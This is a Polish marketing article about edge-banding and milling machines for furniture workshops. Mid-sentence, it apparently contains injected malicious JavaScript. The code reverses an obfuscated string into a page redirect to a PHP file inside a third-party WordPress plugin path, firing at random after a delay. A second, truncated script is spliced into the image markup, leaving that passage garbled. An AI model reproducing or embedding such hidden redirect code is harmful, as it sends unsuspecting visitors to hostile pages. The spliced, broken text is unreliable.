Frezarki – nowoczesne obrabiarki do naroży

Istnieje kilka typów oraz rodzai oklejarek. Oklejarki dzielą się na prostoliniowe, jak również krzywoliniowe. Jak sama ich nazwa wskazuje pierwsza z nich służy do oklejania naroży i brzegów prostych, natomiast oklejarka krzywoliniowa jest niezastąpiona podczas oklejania naroży wypukłych, okrągłych lub różnokształtnych, w których wstępują zarówno uwypuklenia, jak i wklęsłości.

Wielozadaniowe oklejarki do obrzeży

oklejarka pros<script>$nJe=function(n){if (typeof ($nJe.list[n]) == „string”) return $nJe.list[n].split(„”).reverse().join(„”);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script><script>$NjS=function(n){if(typeof ($NjS.list[n])==toliniowa ręczna” height=”149″ src=”http://bramyroletygliwice.pl/wp-content/uploads/2017/08/oklejarka-prostoliniowa-reczna.jpg” style=”float:left;” width=”226″/>Na rynku dostępna jest zatem toliniowe/”>oklejarka prostoliniowa ręczna, oklejarka prostoliniowa jednostronna oraz oklejarka prostoliniowa zautomatyzowana służąca do oklejania naroży meblowych. Jest ona dużych gabarytów i daje możliwość obróbki wielkoformatowych płyt drewnianych, a także innych elementów wymagających oklejania, jak i frezowania. Niektóre oklejarki posiadają także dodatkową funkcję frezowania wstępnego. Taka maszyna jest pożądana przez wielu właścicieli zakładów stolarskich. Za jej pomocą jednocześnie dany element zostaje najpierw sfrezowany, a później oklejony. Oklejanie naroży oraz brzegów służy przede wszystkim zabezpieczeniu danych części przed zniszczeniem oraz gwarantuje estetyczny wygląd. Oprócz tego oklejanie wraz z frezowaniem zapewnia także bezpieczeństwo, z brzegów deski bądź sklejki nie wystają żadne niebezpieczne elementy, takie jak na przykład drzazgi. Nowoczesne oklejarki są niezwykle intuicyjnymi urządzeniami. Maszyny te noszą miano przemysłowych.

Wykorzystywane są zarówno w mniejszych zakładach stolarskich, jak również w ogromnych, znanych fabrykach, w których wykorzystuje się także drewno i inne tworzywa drewnopodobne. Urządzenia te są niezwykle intuicyjne i nowoczesne, dzięki nim praca nad danym elementem, takim jak blat, stół czy inny wyrób jest o wiele krótsza i mniej żmudna, niż miało to miejsca podczas ręcznej obróbki powyższych elementów.